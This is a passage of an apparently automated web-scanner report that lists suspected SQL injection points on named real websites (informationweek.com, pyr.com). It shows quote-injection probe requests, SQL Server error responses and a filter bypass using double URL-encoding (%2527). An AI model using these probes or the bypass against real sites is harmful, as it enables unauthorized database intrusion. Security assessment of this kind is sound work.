1.40. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 [s_lv cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525

Issue detail

The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:48 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:48 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<a href="/whitepaper/Security/Cyber-Terror" class="business">
...[SNIP]...

Request 2

GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:50 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:50 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.41. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 [s_lv_s cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525

Issue detail

The s_lv_s cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv_s cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_lv_s cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%2527;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:20 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:20 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<a href="/whitepaper/Security/Cyber-Terror" class="business">
...[SNIP]...

Request 2

GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%2527%2527;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:21 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:21 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.42. http://www.informationweek.com/whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<a href="/whitepaper/Security/Cyber-Terror" class="business">
...[SNIP]...

Request 2

GET /whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:51 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:51 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.43. http://www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012%2527 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30461

<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test
...[SNIP]...
<p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod">
...[SNIP]...

Request 2

GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012%2527%2527 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:23:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012%2527%2527&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.44. http://www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:23:10 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:10 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<a href="/whitepaper/Security/Cyber-Terror" class="business">
...[SNIP]...

Request 2

GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:23:11 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:11 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.45. http://www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:23:06 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:06 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<a href="/whitepaper/Security/Cyber-Terror" class="business">
...[SNIP]...

Request 2

GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:23:08 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:08 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.46. http://www.pyr.com/pr_prlist/PR120910_IPTV.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyr.com
Path:   /pr_prlist/PR120910_IPTV.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /pr_prlist'/PR120910_IPTV.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:09:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font>
...[SNIP]...

Request 2

GET /pr_prlist''/PR120910_IPTV.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:09:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.47. http://www.pyr.com/store/rp_Can-Vod-Save-IPTV.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyr.com
Path:   /store/rp_Can-Vod-Save-IPTV.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/rp_Can-Vod-Save-IPTV.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:08:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 343
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Incorrect syntax near the keyword 'Save'.</font>
...[SNIP]...

Request 2

GET /store''/rp_Can-Vod-Save-IPTV.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:08:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.48. http://www.pyr.com/store/rp_Global-Mobile-Capex-Index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pyr.com
Path:   /store/rp_Global-Mobile-Capex-Index.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /store'/rp_Global-Mobile-Capex-Index.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:09:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 344
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Incorrect syntax near the keyword 'Index'.</font>
...[SNIP]...

Request 2

GET /store''/rp_Global-Mobile-Capex-Index.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:09:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>

1.49. http://www.pyramidresearch.com/myaccount/register.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
